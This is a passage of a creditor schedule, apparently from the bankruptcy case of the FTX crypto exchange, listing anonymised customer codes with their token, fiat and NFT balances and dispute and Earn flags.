| 07405626 | | SOL[.002081], USD[0.03], USDT[0.00000893] | Yes | |
| 07405628 | | BTC[.0013664], CUSDT[2], DOGE[11.93863747], ETH[0.02856155], ETHW[0.02820587], LINK[.15565385], SOL[.30972267], SUSHI[.76483479], TRX[1], USD[0.00] | Yes | |
| 07405631 | | BRZ[1], CUSDT[1], DOGE[3], SOL[.00069879], SUSHI[.00270412], TRX[1], USD[0.25] | | |
| 07405641 | | USD[118.24] | Yes | |
| 07405647 | | USD[0.01] | | |
| 07405648 | | ETHW[0], EUR[0.00], USD[0.00], USDT[0] | Yes | |
| 07405650 | | ETH[0.00000001], ETHW[0], USD[0.00], USDT[0.00000832] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07405651 | | BTC[.00006595], DOGE[.195], NFT (303727981055678386/MagicEden Vaults)[1], NFT (30869151506139646/Samoyed #3061)[1], NFT (32649111529111219/Birthday Cake #2763)[1], NFT (343441759071755233/MagicEden Vaults)[1], NFT (363856400382752792/Maneki Neko)[1], NFT (377594983909080211/MagicEden Vaults)[1], NFT (386552242278211937/Samoyed #2636)[1], NFT (395104653695104230/The 2974 Collection #1685)[1], NFT (411112254675423099/Birthday Cake #1685)[1], NFT (434495538519631733/MagicEden Vaults)[1], NFT (440034663812815069/Samoyed #4537)[1], NFT (489728509186179330/Birthday Cake #1922)[1], NFT (490654181347321822/The 2974 Collection #1922)[1], NFT (491063113987851172/Samoyed #1940)[1], NFT (511769287633969526/Samoyed #3051)[1], NFT (555124843447446508/Samoyed #989)[1], NFT (555288979011610870/The 2974 Collection #2763)[1], NFT (561588990805202932/MagicEden Vaults)[1], SOL[1.091910001], USD[58.14], USDT[3.33814649] | | |
| 07405664 | | BAT[1.01616574], BRZ[1], DOGE[2543.22177698], ETH[0], UNI[4.99391528], USD[78.91], USDT[2.17106930] | Yes | |
| 07405666 | | TRX[12943.08888432], USD[0.00] | | |
| 07405667 | | ETH[0], ETHW[0], SOL[1.04853984], USD[0.00] | | |
| 07405673 | | BAT[1.70894637], DOGE[1], SOL[1.61331319], USD[24.25] | | |
| 07405680 | | BCH[.00315307] | | |
| 07405682 | | BTC[.00511943], DAI[0], ETH[0], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07405694 | Contingent, Disputed | USD[0.11] | | |
| 07405696 | | BTC[.03598938], ETH[2.22533732], ETHW[2.22440265], NFT (404508389741266503/Entrance Voucher #1819)[1], USD[0.00], USDT[0] | Yes | |
| 07405701 | | BAT[11.23585098] | | |
| 07405702 | | USD[0.23] | | |
| 07405703 | | USD[0.00] | | |
| 07405704 | | CUSDT[1], DOGE[1], SOL[7.566059], USD[200.01] | | |
| 07405705 | | BRZ[4], CUSDT[1], TRX[2], USD[0.01] | | |
| 07405707 | | BTC[.0114], DOGE[1031.067], SUSHI[56.7834], USD[21.43] | | |
| 07405713 | | GRT[1], LINK[1], UNI[1], USD[.94], USDT[3] | | |
| 07405714 | | CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07405715 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07405718 | | CUSDT[6], DOGE[601.22463718], KSHIB[319.75059507], MATIC[5.18661115], SHIB[1780754.65991543], SOL[1.01436918], TRX[1], USD[0.00] | | |
| 07405729 | | DOGE[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07405733 | | ETH[.0001368], ETHW[.0001368], TRX[.001], USD[0.41] | | |
| 07405737 | | BRZ[2], CUSDT[11], DOGE[56.12790279], ETH[.00702355], ETHW[.00694147], GRT[28.58562465], KSHIB[702.42180991], LINK[.66146016], MATIC[107.91406851], SOL[6.86517537], SUSHI[10.43102214], TRX[184.81664991], UNI[3.11998848], USD[0.27] | Yes | |
| 07405738 | | BRZ[.29998944], CUSDT[3], DOGE[7.50405809], TRX[2], USD[0.01] | | |
| 07405740 | | BAT[2], BRZ[1], CUSDT[8], DOGE[2], ETH[.00000001], TRX[1], USD[0.00], USDT[1] | | |
| 07405743 | | SOL[151.68863905], TRX[1], USD[0.00] | | |
| 07405747 | | BTC[0], DOGE[.161], ETH[.00000001], GRT[.722], SOL[.00206], TRX[.906], USD[1.86], USDT[0.03809956] | | |
| 07405748 | | DOGE[0.93172392], USD[0.00] | | |
| 07405749 | | BTC[0.00003921], ETH[.00062546], ETHW[0.00062545], SOL[0], USD[0.50], USDT[0] | | |
| 07405750 | | SUSHI[7.47], USD[0.58] | | |
| 07405755 | | BTC[.004], SOL[23.45504588] | | |
| 07405759 | | BAT[1], CUSDT[4], TRX[1], USD[0.00] | | |
| 07405761 | | BTC[0], USD[0.00] | | |
| 07405764 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07405766 | | CUSDT[1], DOGE[463.88771022], USD[0.00] | | |
| 07405769 | | ETH[.00016479], ETHW[0.00016479], SOL[0], USD[467.55], USDT[0] | | |
| 07405770 | Contingent, Disputed | BRZ[3], CUSDT[8], GRT[1.00498957], TRX[3], USD[0.00] | Yes | |
| 07405774 | | BTC[.004221103], CUSDT[2], DOGE[1293.93059244], USD[1.00] | | |
| 07405775 | | BAT[12.55289499], BRZ[7.89860328], CUSDT[122.09862232], DOGE[172.21944292], SOL[6.25542656], SUSHI[4.4712696], TRX[176.99537458], USD[-9.46] | Yes | |
| 07405778 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07405781 | | TRX[.000001], USDT[2.797317] | | |
| 07405784 | | BAT[1.01566708], BRZ[3], CUSDT[6], DOGE[7.29254932], GRT[1.00344757], TRX[4], USD[0.00] | Yes | |
| 07405785 | | BTC[0], DOGE[1], ETH[0], ETHW[0], SOL[.00006627], USD[0.00] | Yes | |
| 07405788 | | BTC[0], USD[1.03], USDT[0] | | |
| 07405793 | | BTC[0], CUSDT[1], DOGE[1], TRX[0] | | |
| 07405795 | | CUSDT[2], USD[0.00] | Yes | |
| 07405798 | | USDT[3.739075] | | |
| 07405802 | | CUSDT[1], DOGE[3], ETH[.03291812], ETHW[.03291812], GRT[658.43789034], LINK[10.37375928], MATIC[113.68166061], SHIB[3], SOL[14.51903309], UNI[9.89845162], USD[0.00] | | |
| 07405803 | | BF_POINT[2000], USD[13.86] | | |
| 07405805 | | BF_POINT[300], CUSDT[1], USD[0.00] | Yes | |
| 07405807 | | ETHW[1.18130452], USD[2.01] | | |
| 07405810 | | USD[0.53] | | |
| 07405817 | | BTC[.00041891], DOGE[31.2986467], GRT[12.94238594], TRX[373.15711514], USD[0.00] | Yes | |
| 07405828 | | BTC[.00360949], CUSDT[2337.92083027], DOGE[946.82625434], ETH[.15257154], ETHW[.15257154], SOL[.90951794], TRX[1], USD[0.00], USDT[49.67072629] | | |
| 07405833 | | NFT (433405026989941534/Entrance Voucher #29573)[1], NFT (545326654777391857/FTX - Off The Grid Miami #1649)[1] | | |
| 07405838 | | DOGE[1923.75653831], TRX[1], USD[25.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07405842 | | SOL[0.00000001], USD[0.23] | | |
| 07405844 | | SOL[10.86], USD[8.60] | | |
| 07405849 | | BTC[0], CUSDT[1], DOGE[3], SOL[0] | | |
| 07405850 | | BRZ[1], CUSDT[1], GRT[1], TRX[4], USD[1.71], USDT[0.18265528] | | |
| 07405859 | | DOGE[1], USD[0.01] | | |
| 07405863 | | BTC[.0012987], USD[3.04], USDT[0.00000001] | | |
| 07405868 | | BTC[.00000224], MATIC[15.94], SOL[.008256], TRX[.000094], USD[9.85], USDT[0.00708200] | | |
| 07405870 | | SHIB[1], USD[0.00] | Yes | |
| 07405881 | | USD[0.00] | | |
| 07405882 | | SHIB[24021.52077353], USD[0.00] | | |
| 07405890 | | BRZ[1], CUSDT[2], DOGE[10], GRT[1], TRX[1], USD[0.00] | | |
| 07405896 | | BTC[.00256817], TRX[1], USD[0.00] | | |
| 07405901 | | USD[0.00], USDT[0] | | |
| 07405907 | | BRZ[1], CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07405908 | | ETH[.04], ETHW[.04] | | |
| 07405909 | | BTC[0.00045958], DOGE[.887], YFI[.029] | | |
| 07405917 | | TRX[1], USD[0.00] | | |
| 07405918 | | BTC[.0000607], DOGE[.987], ETH[.000453], ETHW[.000453], GRT[.816], MATIC[8.68], SOL[.0412], USD[0.01] | | |
| 07405930 | | BTC[.0308155], CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07405931 | | USDT[0] | | |
| 07405942 | | BTC[0], ETH[0.00054024], ETHW[0.00054025], NFT (43297963790274247/Reem, the Excited)[1], NFT (55191005161325745/Sollama)[1], SOL[.0097], USD[3.55], USDT[0.00347740] | | |
| 07405945 | | BTC[0], ETHW[.000144], SOL[0.00024106], USD[0.00], USDT[0] | | |
| 07405946 | | ETH[.0007], ETHW[.0007], LINK[.0996], USD[1.10], USDT[1.22717315] | | |
| 07405948 | | BAT[5], BRZ[2], CUSDT[2], DOGE[1], LINK[1.00077041], SOL[0.03199053], TRX[7], USD[0.22], USDT[1] | | |
| 07405949 | | BTC[0], DOGE[0], USD[0.01], USDT[0.00018315] | | |
| 07405950 | | CUSDT[2], SOL[76.22724265], TRX[1], USD[0.00] | Yes | |
| 07405951 | | BTC[0], ETHW[.5], USD[2.94] | | |
| 07405972 | | BRZ[3], CUSDT[9], DOGE[57.56716912], ETH[.00483189], ETHW[.00483189], LTC[.0187], SOL[0.14564111], TRX[1], USD[0.59] | | |
| 07405973 | | SUSHI[0], USD[0.00] | | |
| 07405974 | | BTC[.0045954], SOL[66.873], SUSHI[.366] | | |
| 07405978 | | BTC[0], MATIC[1.60417043], USD[0.00], USDT[0.00000001] | | |
| 07405982 | | BTC[.0000491], ETH[0.00000001], ETHW[0], LTC[.00447], NFT (30448971036421517/SKYLINE #0085)[1], USD[0.00], USDT[1.36030343] | | |
| 07405984 | | DOGE[1.00000007], SOL[11.30952492], USD[0.00] | | |
| 07405998 | | BTC[0.00130825], LTC[.00865873], SOL[3.0242], USD[186.71], USDT[0.00000001] | | |
| 07406002 | | CUSDT[14], DOGE[10.4963905], SOL[20.71637210], USD[0.17], YFI[0.02282246] | Yes | |
| 07406005 | | ETH[0], NFT (553830653664227288/NFT)[1], SOL[0], TRX[.000001], USD[0.00], USDT[0.00000179] | | |
| 07406006 | | BAT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[9.28009517], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07406012 | | MATIC[.0000088], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07406014 | | BTC[0.00017005], LINK[.00000001], NFT (370424267714475708/SolFractal #5997)[1], NFT (493578172090588253/SolFractal #3510)[1], NFT (495440941859027158/SolFractal #9707)[1], USD[0.00] | | |
| 07406016 | | CUSDT[109.26080077], DAI[3.25569269], DOGE[3], SUSHI[55.09935957], TRX[3408.24135157], USD[10.94] | Yes | |
| 07406024 | | BRZ[0], CUSDT[25], DOGE[874.56885546], ETH[0.04313719], ETHW[0.04260367], SHIB[5], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07406028 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07406036 | | ETH[.00043983], ETHW[.00043983], USD[0.42], USDT[0.00549220] | | |
| 07406037 | | NFT (503680473765154420/Bahrain Ticket Stub #1822)[1] | | |
| 07406041 | | CUSDT[23657.69771802], TRX[1], USD[0.00] | | |
| 07406042 | | BCH[0], DOGE[2], USD[0.00] | | |
| 07406052 | | BCH[.000705], BTC[.0000871], DOGE[.156], ETH[.000059], ETHW[.000059], GRT[.3], LTC[.0047], SOL[.0772], SUSHI[.244], TRX[.508], USD[0.67] | | |
| 07406053 | | LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07406055 | | USD[0.19] | | |
| 07406059 | | USD[10.00] | | |
| 07406060 | | BTC[0], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07406064 | | CUSDT[1], USD[0.00] | | |
| 07406075 | | BTC[0.09244286], NFT (458844486114475460/FTX - Off The Grid Miami #1442)[1], USD[1.44] | | |
| 07406077 | | BRZ[1], CUSDT[6], GRT[4], SUSHI[1], USD[0.01], USDT[1] | | |
| 07406083 | | DOGE[3.36208979], USD[200.01] | | |
| 07406091 | | ETH[.13623697], ETHW[.13623697], SOL[521.81036999], USD[5429.56] | | |
| 07406093 | | BAT[73.24624577], BTC[.00362977], CUSDT[9], DOGE[1068.43832316], ETH[.0380112], ETHW[.0380112], LINK[.77626206], SUSHI[2.34665392], TRX[1], USD[0.00] | | |
| 07406099 | | BRZ[1], CUSDT[3], ETH[.04143581], ETHW[.04143581], SHIB[868619.91642538], TRX[1], USD[199.69] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07406100 | | BRZ[4], BTC[.01453312], CUSDT[88.27012821], DOGE[5871.15783651], ETH[.65611323], ETHW[.6558317], LTC[2.52025415], SHIB[461007.93794714], SOL[33.18607248], TRX[1789.68556098], USD[0.00] | Yes | |
| 07406101 | | ETH[.00011396], ETHW[.00011396], USD[2.43], USDT[0.00000023] | | |
| 07406106 | | BTC[0.29344957], ETH[4.143085], ETHW[4.143085], LTC[.0049958], SOL[.0511], SUSHI[.336], TRX[.937], USD[0.71] | | |
| 07406112 | | BTC[.35006864], SUSHI[129], USD[3.41] | | |
| 07406113 | | BTC[0], USD[8.69] | | |
| 07406114 | | NFT [556465093533938111/Warriors 75th Anniversary Icon Edition Diamond #1375][1] | | |
| 07406116 | | USD[1.66] | | |
| 07406118 | | BTC[0], LTC[.00565661], USD[0.00] | | |
| 07406125 | | DOGE[3901.764], ETH[2.233792], ETHW[2.233792], NFT [548911137422204046/Entrance Voucher #1937][1], SOL[3.2868], USD[1336.12] | | |
| 07406126 | | USD[0.00] | | |
| 07406133 | | USD[1.09] | | |
| 07406137 | | BAT[6], BRZ[2], CUSDT[2], DOGE[5], ETH[3.71471759], ETHW[3.71471759], GRT[5], SOL[441.74044856], TRX[8], UNI[2], USD[11229.45], USDT[7] | | |
| 07406138 | | SOL[0], USD[0.01], USDT[0] | | |
| 07406140 | | AAVE[5.15], ETH[0.47450424], ETHW[0.47450424], GRT[0.37116735], LINK[0], SOL[0], UNI[0], USD[0.12], USDT[0] | | |
| 07406143 | | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07406145 | | SOL[.996], USD[3.97] | | |
| 07406149 | | ETHW[.00046926] | Yes | |
| 07406156 | | BAT[58.71063438], BRZ[520.28510999], BTC[.00174944], CUSDT[2367.5601591], DOGE[449.27967544], ETH[.01863819], ETHW[.01863819], GRT[35.56989], SUSHI[6.79830029], TRX[868.66676251], UNI[1.86704248], USD[0.98], USDT[1], YFI[.00255863] | | |
| 07406165 | | USD[0.00], USDT[0] | | |
| 07406166 | | CUSDT[1], DOGE[3], GRT[1], USD[0.00], USDT[0] | | |
| 07406174 | | BTC[0], DOGE[0], ETH[0], SOL[0] | | |
| 07406176 | | TRX[1], USD[0.50] | | |
| 07406178 | | BTC[.0000002], DOGE[0], SHIB[93269656.88845521], USD[0.01], USDT[0.00000001] | Yes | |
| 07406179 | | BTC[0], USD[0.00] | | |
| 07406180 | | BAT[3], BRZ[2], BTC[1.0053589], CUSDT[3], DOGE[45025.70891541], GRT[4], SHIB[1], SOL[1156.67500716], SUSHI[1], TRX[1], USD[1.92], USDT[3] | | |
| 07406181 | | BTC[0.00003254], ETH[0.00079323], ETHW[25.00079323], LINK[.08017234], SOL[.004544], USD[0.00], USDT[0.58461356] | | |
| 07406183 | | ETH[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07406188 | | BTC[0], ETH[0], ETHW[0], NFT [441679053630027775/Mystery Box][1], USD[0.87] | | |
| 07406190 | | CUSDT[3], USD[0.00] | | |
| 07406192 | | BAT[.0007822], BRZ[4], BTC[.01237867], CUSDT[9], ETH[.30379341], ETHW[.30360505], SHIB[1], TRX[3], USD[51.33] | Yes | |
| 07406193 | | CUSDT[2], DOGE[.19042462], TRX[2], USD[0.21] | | |
| 07406194 | | ETH[.00050924], ETHW[.00050924], USD[1.84] | | |
| 07406195 | | BAT[2.08367531], BRZ[2], BTC[0], CUSDT[5], DOGE[6.01926022], ETH[0], GRT[2], LINK[0], SOL[0], SUSHI[1.08214956], TRX[7.25847277], USD[0.00], USDT[0] | Yes | |
| 07406197 | | DOGE[1041.46994559], USD[0.00] | | |
| 07406198 | | AAVE[.001], SUSHI[.06312716], UNI[.000904], USDT[2.3700121] | | |
| 07406203 | | BAT[0], DAI[0], DOGE[0], GBP[0.00], USD[0.01], YFI[0] | | |
| 07406213 | | DOGE[294.41363794], GRT[7.91542574], LINK[3.22014482], SOL[.96454409], SUSHI[1.82209988], TRX[1], UNI[2.09878851], USD[0.00] | Yes | |
| 07406215 | | DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07406217 | | BTC[.11081841], CUSDT[1], DOGE[2], ETH[1.36140971], ETHW[1.36083793], SOL[18.29842533], SUSHI[547.79747816], TRX[1], UNI[1.10234794], USD[6.10], USDT[4.33108406] | Yes | |
| 07406219 | | DOGE[960.11448412], USD[0.00] | | |
| 07406224 | | BAT[1], DOGE[1], USD[0.00], USDT[1] | | |
| 07406227 | | DOGE[3], TRX[1], USD[0.01] | | |
| 07406230 | | BTC[0.00002603], ETH[.0025774], ETHW[0.00025774] | | |
| 07406242 | | SOL[.0559], TRX[.79359], USD[1.31] | | |
| 07406246 | | USD[0.00] | | |
| 07406249 | | BRZ[1], CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07406250 | | DOGE[1], GRT[2], USD[374.93] | | |
| 07406251 | | USD[0.00] | | |
| 07406253 | | CUSDT[1], USD[0.00] | | |
| 07406255 | | BCH[0], BTC[0], DOGE[79.48433838], ETH[0], ETHW[0], EUR[0.00], LTC[0], NFT [521498907833837986/Entrance Voucher #3597][1], PAXG[0], SHIB[644773.74622432], SOL[0], SUSHI[5.28099734], TRX[0], UNI[1.14048496], USD[0.00], USDT[0] | Yes | |
| 07406260 | | BTC[.1233765], ETH[.774225], ETHW[.774225], LINK[53.7462], NFT [373980877523535421/Imola Ticket Stub #375][1], SOL[38.35483], SUSHI[91.8445], TRX[.356], USD[4064.40] | | |
| 07406263 | | BAT[1], BRZ[2], BTC[0], CUSDT[6], DOGE[1], ETH[0], LINK[0], TRX[2], UNI[0], USD[0.00], USDT[0.00009505] | | |
| 07406265 | | BTC[0], ETH[.00040801], ETHW[0.00040800], USD[1.94], USDT[0.00000001] | | |
| 07406266 | | BRZ[2], BTC[.01068307], CUSDT[7], DOGE[26.87738813], SHIB[1], SOL[15.23192585], USD[0.00] | | |
| 07406267 | | BAT[7232.44443174], BCH[1.08079398], BRZ[2], BTC[.08670851], CUSDT[2], DOGE[87904.95312362], ETH[.38093015], ETHW[.38079965], GRT[2393.25580126], KSHIB[60393.5836998], LINK[130.6352504], MATIC[1882.87103636], SHIB[20055641.80994895], SOL[217.17008994], TRX[10.00059977], USD[0.00], USDT[2.11654096] | Yes | |
| 07406268 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07406271 | | CUSDT[3], DOGE[.19418479], TRX[1], USD[105.95] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07406275 | | USD[0.01] | | |
| 07406286 | | CUSDT[4], DOGE[.00414095], TRX[1], USD[0.00] | Yes | |
| 07406287 | | BTC[0.05273543], ETHW[.289598], MATIC[483], USD[0.03] | | |
| 07406289 | | BTC[0.03839418], LINK[18.082805], LTC[4.00757937], TRX[0], USD[2.25], USDT[0.00000068] | | |
| 07406293 | | BRZ[1], DOGE[2], SUSHI[12.06353751], TRX[1], USD[0.00] | Yes | |
| 07406299 | | ETHW[.1786297], NFT (407321818751957640/Frakt-6429)[1], SOL[0], SUSHI[0], TRX[.000001], USD[0.00] | | |
| 07406300 | | GRT[1701.168], SOL[192.228], USD[20.82] | | |
| 07406304 | | USD[0.00] | | |
| 07406310 | | BRZ[1], CUSDT[4], USD[0.01] | | |
| 07406313 | | BTC[.00017458], USD[0.00] | | |
| 07406316 | | CUSDT[1], DOGE[2], TRX[1], USD[114.58], USDT[10.84897066] | Yes | |
| 07406326 | | SOL[10.458], USD[0.39] | | |
| 07406329 | | CUSDT[1], SOL[103.51460658], USD[0.00] | Yes | |
| 07406332 | | USD[50.00] | | |
| 07406336 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07406337 | | DOGE[89.24714676], TRX[33.74884916], USD[0.00] | | |
| 07406338 | | USD[0.00] | Yes | |
| 07406343 | | BRZ[3], CUSDT[8], DOGE[1.2145534], SOL[.00004984], TRX[10], USD[0.75], USDT[1] | | |
| 07406347 | | TRX[.906738], USD[0.00], USDT[0.00000092] | | |
| 07406351 | | CUSDT[11], DOGE[4], GRT[1], SHIB[13451.64012409], TRX[6], USD[0.00] | Yes | |
| 07406368 | | BAT[931.74286885], BRZ[1], DOGE[9.52194107], TRX[3], USD[0.00] | Yes | |
| 07406369 | | BRZ[54.98172962], CUSDT[1], DOGE[1], TRX[2979.986426], USD[0.00] | | |
| 07406370 | Contingent, Disputed | BAT[0], DOGE[0], SHIB[0], USD[0.00] | | |
| 07406376 | | ETH[.000939], ETHW[.000939], SOL[.00521], USD[0.00], USDT[0] | | |
| 07406377 | | BTC[.00000547], USD[0.00] | | |
| 07406379 | | SHIB[1], TRX[.000066], USD[0.91], USDT[0.16542932] | | |
| 07406382 | | USD[1788.94], USDT[0] | Yes | |
| 07406386 | | BTC[.0000449], USD[0.00] | | |
| 07406387 | | USD[0.00] | | |
| 07406389 | | BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], SOL[0.00000001], USD[0.00], USDT[0] | | |
| 07406390 | | BRZ[2], CUSDT[2], TRX[1], USD[0.01], USDT[1] | | |
| 07406393 | | MATIC[4.23069731], SOL[24.11370699], USD[0.00], USDT[0.00000001] | | |
| 07406397 | | BTC[.08735914], CUSDT[1], DOGE[1], ETH[1.00162442], ETHW[1.00162442], USD[0.00], USDT[1] | | |
| 07406406 | | BRZ[0], SHIB[2515.25439695], USD[0.00], USDT[0.00000001] | Yes | |
| 07406410 | | ALGO[129.99995305], BTC[.00245951], DOGE[107.47329715], SHIB[3], USD[0.03] | Yes | |
| 07406411 | | ETH[0], ETHW[0], USD[0.01] | Yes | |
| 07406413 | | BTC[.00538873], CUSDT[14], DOGE[842.9152976], ETH[.03829264], ETHW[.03781384], KSHIB[461.87270136], SHIB[496636.12755051], TRX[1], USD[0.03] | Yes | |
| 07406416 | | BF_POINT[1100], BRZ[2], DOGE[2], ETHW[.71542476], NFT (313995056798915365/Silverstone Ticket Stub #92)[1], NFT (354689858078070352/Barcelona Ticket Stub #307)[1], NFT (406760803470836011/Founding Frens Investor #226)[1], SHIB[34], SUSHI[14.64886492], TRX[9], UNI[3.93109548], USD[0.01] | Yes | |
| 07406417 | | DOGE[1.3298047 1], USD[0.00] | | |
| 07406421 | | DOGE[272.727], ETH[2.005992], ETHW[2.005992], GRT[1556.442], SOL[149.85], USD[224.12] | | |
| 07406426 | | DOGE[ 22273065], ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07406427 | | BRZ[1], CUSDT[7], DOGE[4880.44177973], TRX[1.00004148], USD[0.51] | Yes | |
| 07406428 | | BAT[2], BRZ[7.00825956], BTC[0.22258172], CUSDT[3], DOGE[43792.24614624], ETH[7.90464514], ETHW[6.95012882], GRT[1], LINK[278.27920797], MATIC[2864.2155089], SHIB[4], SOL[57.93963194], TRX[14], USD[3658.49], USDT[1.00006330] | Yes | |
| 07406436 | | USD[0.00], USDT[0] | | |
| 07406437 | | SOL[.0088], USD[0.36] | | |
| 07406446 | | USD[1000.00] | | |
| 07406447 | | ETH[.005], ETHW[.005] | | |
| 07406450 | | BRZ[1], CUSDT[11], DOGE[1], SHIB[89.12400471], USD[0.00] | Yes | |
| 07406452 | | USD[0.00], USDT[0.00000004] | | |
| 07406461 | | NFT (412433997311192628/Coachella x FTX Weekend 2 #397)[1] | | |
| 07406462 | | BRZ[1], USD[5.00] | | |
| 07406464 | | BTC[0.00000001], ETH[.00088116], USD[0.01], USDT[.001984] | | |
| 07406472 | | USD[0.89] | | |
| 07406477 | | BRZ[1], CUSDT[5], TRX[1], USD[0.01] | | |
| 07406481 | | USD[0.00] | | |
| 07406484 | | TRX[5785.56230872] | Yes | |
| 07406486 | | BRZ[1], CUSDT[2], DOGE[305.01427222], USD[0.00], USDT[.9935137] | | |
| 07406489 | | DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07406493 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07406500 | | CUSDT[1], DOGE[21049.67072781], TRX[3], USD[-500.00] | | |
| 07406501 | | ETH[0], LINK[0], USD[0.00], USDT[0] | | |
| 07406507 | | BTC[0], MATIC[0], SHIB[45547.77948249], USD[4.07], USDT[0] | | |
| 07406518 | | DOGE[1390.13621058], SOL[.98382859], USD[8.86] | | |
| 07406523 | | BCH[.0398875], BF_POINT[600], BRZ[2], CUSDT[3], KSHIB[427.86263158], MATIC[8.40111518], NFT [317703068302948197/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #30][1], NFT [332608507461616017/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #29][1], NFT [396556773314655739/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #33][1], NFT [445883056974880374/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #31][1], NFT [452220844846338326/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #22][1], NFT [573849570076549307/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #23][1], SHIB[11], SOL[.00002353], TRX[67.40207593], USD[3.54], USDT[7.38824382] | Yes | |
| 07406527 | | BTC[0], ETH[0], GRT[0], USD[0.00], USDT[0] | | |
| 07406530 | | BTC[.00366468], CUSDT[3], DOGE[13], ETH[.12046556], ETHW[.12046556], LINK[1.01978997], LTC[.04530507], USD[0.00] | | |
| 07406531 | | BRZ[3], CUSDT[588.00172255], DOGE[815.63909357], MATIC[285.28635202], SHIB[2], SOL[42.51398181], TRX[7], UNI[1.03308319], USD[3608.38] | Yes | |
| 07406532 | | BTC[.000094], SOL[62.0123], USD[36.00] | | |
| 07406533 | | CUSDT[1], DOGE[752.06715787], USD[7.83] | Yes | |
| 07406534 | | BRZ[4], BTC[0], CUSDT[2], DOGE[0], ETH[0.11554814], ETHW[0.11442443], SUSHI[0], TRX[2], USD[0.00] | Yes | |
| 07406537 | | BRZ[2], CUSDT[6], TRX[2], USD[0.00], USDT[1] | | |
| 07406541 | | DOGE[172.90309272], SOL[1.87046797], USD[0.00] | | |
| 07406544 | | BTC[.00008024], CUSDT[2], DOGE[.00070747], ETH[.00112889], ETHW[.00112889], MATIC[3.05617779], USD[0.00], USDT[1], YFI[.00015334] | | |
| 07406545 | | ETH[.07006743], ETHW[.07006743], SOL[1], USD[0.00] | | |
| 07406547 | | BCH[.02359163], BTC[.012145], CUSDT[1], ETH[.02042734], ETHW[.02017217], LTC[.21061651], MKR[.00384036], USD[220.03] | Yes | |
| 07406548 | | BAT[1], TRX[1], USD[0.01] | | |
| 07406549 | | BAT[1], CUSDT[3], DOGE[1], ETH[0], SOL[0], TRX[6], USD[0.00], USDT[1.08164564] | Yes | |
| 07406550 | | BAT[1], BRZ[2], BTC[.00860422], CUSDT[1], DOGE[323.43869631], ETH[.35269838], ETHW[.35269838], SHIB[1], USD[606.40] | | |
| 07406554 | | BRZ[2], DOGE[3], GRT[1], LINK[1], SHIB[1], TRX[2], USD[0.01], USDT[1] | | |
| 07406558 | | USD[0.01] | | |
| 07406562 | | BTC[0], ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07406565 | | USD[4.77] | | |
| 07406567 | | BRZ[1], CUSDT[4.66381804], DOGE[18680.68254302], KSHIB[1263.13175405], SHIB[5926224.0284778], TRX[1024.20638318], USD[0.00] | | |
| 07406570 | | SOL[.05] | | |
| 07406574 | | BAT[1], CUSDT[1], USD[0.00] | | |
| 07406575 | | BTC[0], SOL[0], USD[500.00] | | |
| 07406581 | | CUSDT[9], DOGE[1.11764495], TRX[3], USD[0.25], USDT[0] | | |
| 07406583 | | USD[0.00], USDT[0] | | |
| 07406584 | | BTC[.00035676], DOGE[1], USD[0.00] | | |
| 07406588 | | BRZ[1], CUSDT[523.35326346], DOGE[1], LTC[4.62586133], MATIC[280.14051642], SHIB[4948981.04189462], TRX[2630.38673845], USD[7573.38] | Yes | |
| 07406591 | | AAVE[.74205103], CUSDT[3], DOGE[1], SOL[14.78600477], UNI[4.8542791], USD[0.00] | Yes | |
| 07406592 | | BRZ[61.61030971], BTC[.00082974], CUSDT[1.27949219], DOGE[1], TRX[.02028519], USD[7.98] | Yes | |
| 07406593 | | CUSDT[1], DOGE[740.20075058], ETH[.17900143], ETHW[.17900143], TRX[1], USD[0.00] | | |
| 07406602 | | DOGE[1], TRX[1690.18217121], USD[400.00] | | |
| 07406603 | | ETH[0], USD[0.00] | | |
